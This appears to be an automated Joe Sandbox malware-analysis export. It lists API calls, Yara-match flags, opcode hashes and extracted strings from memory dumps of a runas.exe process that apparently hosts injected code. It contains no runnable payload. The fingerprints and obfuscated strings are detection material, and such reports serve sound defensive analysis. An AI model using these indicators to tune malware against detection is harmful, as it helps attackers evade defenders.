                                                                                                              • Instruction Fuzzy Hash: BB90026120240003610971584414616419A9BE0216B59C021F1019590DC525D9917125
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 20060c528361a643edd84c0bb427e347a36ce4311ade8f358ca5306c3de5657d
                                                                                                              • Instruction ID: 9cafc87abf087154507163519027a171e2c0d2c5e400e687fb919515b26df9e2
                                                                                                              • Opcode Fuzzy Hash: 20060c528361a643edd84c0bb427e347a36ce4311ade8f358ca5306c3de5657d
                                                                                                              • Instruction Fuzzy Hash: F890023120140803F1847158440464A01959BD1316F99C015B002A654DCA15DB5977A1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 5ffdf7f3cfd1a313cc46a276d9f9faad59d9d367423922c9fd3167008cccbcf4
                                                                                                              • Instruction ID: 66d876fe8852c70e838b1cc7cb78ae9dc0716879b0c17399155fb5f20ce8041b
                                                                                                              • Opcode Fuzzy Hash: 5ffdf7f3cfd1a313cc46a276d9f9faad59d9d367423922c9fd3167008cccbcf4
                                                                                                              • Instruction Fuzzy Hash: 2B90023120544843F14471584404A4601A59BD031AF59C011B0069694D9625DE55B661
                                                                                                              APIs
                                                                                                              Memory Dump Source
• Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
• Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ed2d5a33ad0b4c977931923a27a42ffe1702b456c229cd38a002671cd8b568e4
• Instruction ID: 4f914c2d65196c8d16f1f5c1b6d358111b4bef8beb4e635ae428267797499eb4
• Opcode Fuzzy Hash: ed2d5a33ad0b4c977931923a27a42ffe1702b456c229cd38a002671cd8b568e4
• Instruction Fuzzy Hash: F090023160540803F1547158441474601959BD0316F59C011B0029654D8755DB5576A1
APIs
Memory Dump Source
• Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
• Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 2b202b633bbb1c6b2dff7e419f25015d785a27b11f165252d71ddadbc21585a0
• Instruction ID: 69eb2fcc079ee864beaaa463f0c9eeed266050d0edbdaf6ba10547cb58f211ad
• Opcode Fuzzy Hash: 2b202b633bbb1c6b2dff7e419f25015d785a27b11f165252d71ddadbc21585a0
• Instruction Fuzzy Hash: E790023160550403F1047158451470611959BD0216F69C411B0429568D8795DA5175A2
APIs
Memory Dump Source
• Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
• Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 8c3f1471877b312f89850eb5587723422a61bf0b052076a4860b74c648c6af43
• Instruction ID: dcfb6e4e7b3865686d3bf0ddaa070d56390dd9cd08e952396c48aa39713406ea
• Opcode Fuzzy Hash: 8c3f1471877b312f89850eb5587723422a61bf0b052076a4860b74c648c6af43
• Instruction Fuzzy Hash: 0E90022124545103F154715C44046164195BBE0216F59C021B0819594D8555D9557221
APIs
• Sleep.KERNELBASE(000007D0), ref: 00513E2B
Strings
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 78f39cce84dc34b10c0423e31c2e0c7d5db74fbcfdaa9ac785b08b259528025a
• Instruction ID: 31b6074fa1bd2f4f309b500602e2123db29d156647fe180f290201dd9265197f
• Opcode Fuzzy Hash: 78f39cce84dc34b10c0423e31c2e0c7d5db74fbcfdaa9ac785b08b259528025a
• Instruction Fuzzy Hash: 263150B1A00306BBE714DF64C885FEBBBB9FB84754F04451DF6196B241D7746A40CBA4
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: InitializeUninitialize
• String ID: @J7<
• API String ID: 3442037557-2016760708
• Opcode ID: 024e41c3443e1c742c29d0eb988911072b4869f3f3b8d86ec47da04d6b61bf15
• Instruction ID: 3083a3605316810e4e45f50d4a81496a024063a2b89203637b9f10bd2971cb03
• Opcode Fuzzy Hash: 024e41c3443e1c742c29d0eb988911072b4869f3f3b8d86ec47da04d6b61bf15
• Instruction Fuzzy Hash: 8B313275A0060AAFDB10DFD8D8809EFB7B9FF88304B108559E505E7254D775EE45CBA0
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: InitializeUninitialize
• String ID: @J7<
• API String ID: 3442037557-2016760708
• Opcode ID: 83b565ed50ab540c01ea2aa686d55c910cfa550a1527ec7d5235f224f2ae047e
• Instruction ID: 8b817d8137c6352332aa4b19e2cffd80488d1616c2b6d02355924eeb70fa4423
• Opcode Fuzzy Hash: 83b565ed50ab540c01ea2aa686d55c910cfa550a1527ec7d5235f224f2ae047e
• Instruction Fuzzy Hash: 0C3130B5A0060AAFDB10DFD8C8809EFB7B9FF88304B108559E505EB254D775EE45CBA0
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005048B2
Strings
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: Load
• String ID: |xle
• API String ID: 2234796835-379029741
• Opcode ID: 910679a9904b8069b1d51d486db6c279e02f9d7234766a7e3e118b20bf22d700
• Instruction ID: ff903a5fec708f679fd15aa72917deca01530a175333e4eb5b947d351c1dc258
• Opcode Fuzzy Hash: 910679a9904b8069b1d51d486db6c279e02f9d7234766a7e3e118b20bf22d700
• Instruction Fuzzy Hash: 7F213AB6504646DFDB14CA14E885BAEFFB5FF84354B10C969D505DB180D331DA46CBA0
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005048B2
Strings
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: Load
• String ID: |xle
• API String ID: 2234796835-379029741
• Opcode ID: e4fe23eff29353edba087925b584054d096c447138b5cb241e71bf32c61b0e01
• Instruction ID: bcde00ba9c49714dca0d458c38b8c61857efc9ec534968de220edf04821019da
• Opcode Fuzzy Hash: e4fe23eff29353edba087925b584054d096c447138b5cb241e71bf32c61b0e01
• Instruction Fuzzy Hash: CF0152B5D4020EBBEF10DAA0DC46FDDBBB9AF54308F008594EA0897281F631EB44CB91
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005048B2
Strings
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: Load
• String ID: |xle
• API String ID: 2234796835-379029741
• Opcode ID: d25f39db3afd783deaab873e3bcf30208ff7f0e248ea19beb78da20a5af16b63
• Instruction ID: db8f8edf32748364c47e7d66d672e7191b5687ba9f03d54effe19739da37f012
• Opcode Fuzzy Hash: d25f39db3afd783deaab873e3bcf30208ff7f0e248ea19beb78da20a5af16b63
• Instruction Fuzzy Hash: 8AE0266290420C7AD720A549AC47F6FBF5DFB80345F008695FE0C81180D5606C6099F2
APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,005085DE,00000010,00000000,?,?,00000044,00000000,00000010,005085DE,?,?,00000000), ref: 00519C00
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
• Opcode ID: 56eb0e9ba615e6f0ba1c344e72caaad87569098cab80dc5f91bc00001d277163
• Instruction ID: a17ff8c9a76a23f1bf5eb3d383b5aed044baf7aa505b3e6cd781585a380cd515
• Opcode Fuzzy Hash: 56eb0e9ba615e6f0ba1c344e72caaad87569098cab80dc5f91bc00001d277163
• Instruction Fuzzy Hash: 880192B6215148BBCB44DE99DC81EEB77ADAFCC754F418209BA09E3241D634F851CBA4
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004F9DC5
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 5dfc573520e4da69a29796d4b0a20283220730d3f349390b53d69111d6ea08b0
• Instruction ID: 1de6c765c550f5c931dee7b240ca351e89a3bb9237c5a1a6d4fd775c8ffed1fd
• Opcode Fuzzy Hash: 5dfc573520e4da69a29796d4b0a20283220730d3f349390b53d69111d6ea08b0
• Instruction Fuzzy Hash: DFF0657339030436E33061A9DC02FDB7A5C9BC0BA1F14002AF70DEA5C0D996B94182E9
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 004F9DC5
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 681c58012fc12c654f724cb378707f5535f424563a855994c9408cc3d810c1a6
• Instruction ID: 40b17500e93b19b131e0539ef5a92a4ed02313a383c052ecd05cbd4cbb19dc11
• Opcode Fuzzy Hash: 681c58012fc12c654f724cb378707f5535f424563a855994c9408cc3d810c1a6
• Instruction Fuzzy Hash: 7EE0927278030433E23061A9CC03FDB7A5C9F91B90F15001AFB09EB6C1D996B98183E9
APIs
• RtlAllocateHeap.NTDLL(00501D19,?,?,00501D19,?YQ,?,?,00501D19,?YQ,00001000,?,?,00000000), ref: 00519AFC
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 7e3178983a9da5f247ca9c5e6e561463a882993b86938145b26ca526565d38ef
• Instruction ID: a3215f3cdb4e7cd1bba91b7a5a433c585527fd378a31b4b1ec2e1f36313c1365
• Opcode Fuzzy Hash: 7e3178983a9da5f247ca9c5e6e561463a882993b86938145b26ca526565d38ef
• Instruction Fuzzy Hash: E6E06D722002087BD614EE59DC41EDB37ACEFC9710F004409FA08A7242C670B85086B5
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,A7E85651,00000007,00000000,00000004,00000000,005040BA,000000F4), ref: 00519B4F
Memory Dump Source
• Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: f6d78897837eaf5728a722e9d9bcfedcecfa8106b870659041dfb3a614048c7d
• Instruction ID: 5c34945dc6b62f73500399237829ac5fc129633820fbed75068f4f01e129c3dc
• Opcode Fuzzy Hash: f6d78897837eaf5728a722e9d9bcfedcecfa8106b870659041dfb3a614048c7d
• Instruction Fuzzy Hash: F5E06D71200204BBD610EE59DC41FDB77ACEFC5710F004419FA08A7242D630B950C7B8
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 0050864C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 1b2b3e8ccb99ad1f8b639a8c5736c7058d9a08c7c7bc5d7bf467b436ca089585
                                                                                                              • Instruction ID: faff1696678a08c5d7a0ef1f47931c2d6790d26ceec4f2e3a59d0a3adc58cb59
                                                                                                              • Opcode Fuzzy Hash: 1b2b3e8ccb99ad1f8b639a8c5736c7058d9a08c7c7bc5d7bf467b436ca089585
                                                                                                              • Instruction Fuzzy Hash: A5E0D87121020427FB245958CC45FBB33587758764F090550B9A88B2C1DE67FA424190
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 0050864C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 137ad55c2b2624d1fcbe85122e1ce2fcad3888f40c5e0a82762f691a4d894d2e
                                                                                                              • Instruction ID: 26bfd93031b9a50038ce82349bc08511e317b50f71dcad9856c980aecbe1f7f6
                                                                                                              • Opcode Fuzzy Hash: 137ad55c2b2624d1fcbe85122e1ce2fcad3888f40c5e0a82762f691a4d894d2e
                                                                                                              • Instruction Fuzzy Hash: F3E0807125030417FF245568DC45F7A37587754764F194950B95CDB1C1DD77FA418150
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(?,00000111), ref: 005010E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 1836367815-0
                                                                                                              • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                              • Instruction ID: 51d79727d459871eb6a5aef52d2ee173023c54f2e4c11901f218a78328c57799
                                                                                                              • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                              • Instruction Fuzzy Hash: 09D0A76770000C76A61145846CC2CFEB71CEB846A5F004067FB08D2040D9214D0206B1
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00502000,0051827F,?YQ,00501FC3), ref: 00508443
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: 18781d1c6b367030a5622c59b903bfa11350597898cb3e7a9735be8269b8ce81
                                                                                                              • Instruction ID: de2bd90b93da5f9dddf02b5a236863ba94ce6d7606d17d513f40f1f413794ea2
                                                                                                              • Opcode Fuzzy Hash: 18781d1c6b367030a5622c59b903bfa11350597898cb3e7a9735be8269b8ce81
                                                                                                              • Instruction Fuzzy Hash: 2AD05E713903093BFA80A6E5CC47F6A36CC6B80794F454068BA48E62C2ED65F50086AA
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8d84fe57032b7575176fc6e9a6985454f9397b8bafea0a549fe7833569a51989
                                                                                                              • Instruction ID: 3046148f232eac4fe5e1cffca1d455894820f5819064ca6acde5d5b8d2cf20ac
                                                                                                              • Opcode Fuzzy Hash: 8d84fe57032b7575176fc6e9a6985454f9397b8bafea0a549fe7833569a51989
                                                                                                              • Instruction Fuzzy Hash: 16B02B318014C0C6FB00F72007087073A407BC0301F19C062F2030241E0738D0C0F171
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943079379.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4300000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d030ac54c85d87903368dc597f3c423f24ff658546ca05aad49e368bbcbbc960
                                                                                                              • Instruction ID: 2ed5b8470102e88d84945dbd5ab0e4451fdbb1711cb41ce1f1c2d9ba70efde92
                                                                                                              • Opcode Fuzzy Hash: d030ac54c85d87903368dc597f3c423f24ff658546ca05aad49e368bbcbbc960
                                                                                                              • Instruction Fuzzy Hash: E341C77161CB0D4FE36CAF68A0917B6B3F1FF85314F505A2DD58AC3292EA70E8468685
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943079379.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4300000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                              • API String ID: 0-3754132690
                                                                                                              • Opcode ID: 9d0c214882fc2e50237bb0f4810af6efe925b166f08956caa8cac9141d3dfa62
                                                                                                              • Instruction ID: 7fe5cd7fee703523042302dc5d5370d41a821be8aa027f0950ead3ee925fcf5c
                                                                                                              • Opcode Fuzzy Hash: 9d0c214882fc2e50237bb0f4810af6efe925b166f08956caa8cac9141d3dfa62
                                                                                                              • Instruction Fuzzy Hash: AB915FF04083948AC7198F54A0612AFFFB1EBC6305F15856DE7E6BB243C3BE89058B85
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 7ddfb18143f35cf42c4f8f1f4433be9d6f34d3b16c11457b564dcc875ec6d510
                                                                                                              • Instruction ID: f47332b80b74d632f5658adcf44a4e137aa05e63fa16a8fc9a02b174d543ae8b
                                                                                                              • Opcode Fuzzy Hash: 7ddfb18143f35cf42c4f8f1f4433be9d6f34d3b16c11457b564dcc875ec6d510
                                                                                                              • Instruction Fuzzy Hash: 33510DB5B00226BFDF10DF58999097EF7B8BB49204B54826BF455D7681E234FE40ABE0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 84912a3d9b022a68a699d1143960d8fd3bfd605e946b9e53a3da07531e41b4ea
                                                                                                              • Instruction ID: 9d57b69c6f36d30b1d1e93c95b80cb82cb9dd780efd3243c9cc32d351feaef25
                                                                                                              • Opcode Fuzzy Hash: 84912a3d9b022a68a699d1143960d8fd3bfd605e946b9e53a3da07531e41b4ea
                                                                                                              • Instruction Fuzzy Hash: C151E471A00645BBDF20DE9DD89097EB7F8BB44204F048CAAF599D7681E674FE00AB60
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943079379.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4300000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: *6/.$B,6B$B5-5$KB!$MVWL$RLPV$SBJ)$SPLR$TLSY$TVKB$WLRB$WQUL$WQUL
                                                                                                              • API String ID: 0-2660536534
                                                                                                              • Opcode ID: 345ca938f719f1729864ccf3c5c2e3c8e91c2c77728336aeb481991aeb7a8e53
                                                                                                              • Instruction ID: 225124982a4a9f87728492100eed239fd3b2aff437e7433729e0c2f0091fcb1a
                                                                                                              • Opcode Fuzzy Hash: 345ca938f719f1729864ccf3c5c2e3c8e91c2c77728336aeb481991aeb7a8e53
                                                                                                              • Instruction Fuzzy Hash: CE2136B090064CDFDF14DF90D5486EDBBB1FF14308F819169E829AB204D7719299CF89
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04554655
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04554787
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04554742
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 045546FC
                                                                                                              • ExecuteOptions, xrefs: 045546A0
                                                                                                              • Execute=1, xrefs: 04554713
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04554725
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 3e21cde52bd3ea4a36a0a2f217391675a0284bfeaea2e6dd2b2cfc3cecf70867
                                                                                                              • Instruction ID: 0580781ca8f8c227ac7b845ec8a50c8497d70db5a298f1361f549bd39fa0ba59
                                                                                                              • Opcode Fuzzy Hash: 3e21cde52bd3ea4a36a0a2f217391675a0284bfeaea2e6dd2b2cfc3cecf70867
                                                                                                              • Instruction Fuzzy Hash: C051E935A002197BFF10AAA8EC95FBD77A8FF49304F14049AE505A71A1E770BE45EF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
